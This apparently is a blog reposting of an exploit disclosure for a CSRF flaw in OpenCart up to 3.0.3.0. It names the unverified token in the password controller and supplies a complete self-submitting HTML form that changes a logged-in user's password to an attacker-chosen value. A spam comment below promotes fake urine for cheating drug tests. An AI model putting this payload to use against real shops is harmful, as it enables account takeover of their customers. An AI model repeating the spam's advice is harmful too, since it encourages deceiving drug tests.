Opencart-v3-0-3-0 user changes password at csrf vulnerability

Software Link:https://github.com/opencart/opencart/
Date: 06.28.2018
Exploit Author:CK01
Version:<= V3-0-3-0

0x00 Vulnerability analysis

     The user token was not verified at the password change, causing the csrf vulnerability to modify the user password

 /upload/catalog/controller/account/password.php



0x01 Exploit

Save the following exp as html and open the run

<html>


  <body>

    <form id="post123" name="post123" action="http://192.168.0.46/opencart/index.php?route=account/password&language=en-gb" method="POST" enctype="multipart/form-data">

  <input type="hidden" name="password" value="CK01ck01" />
      <input type="hidden" name="confirm" value="CK01ck01" />

<script>

        document.getElementById('post123').submit();

 </script>

    </form>

  </body>

</html>

The end user's password will be modified and there will be problems in the user's modification of the data.





评论

  1. If you don’t have time for a THC detox, which is understandable in a variety of situations, you can try the following. If all else fails and you’re pressed for a test, you might be able to get away with it with the use of fake urine. But remember that this is a last resort and go for other methods mentioned in this guide whenever you can. In case you do find yourself grasping at straws, cheat on the drug test using a reliable fake pee kit. Fake urine has been a very useful method to trick drug tests in the past few decades. Its popularity can be solely attributed to the effectiveness of this method. Visit: https://www.urineworld.com/

    回复删除

发表评论

此博客中的热门博文

Docker's latest version of privilege escalation vulnerability

Charles 4.2.7 XML External Entity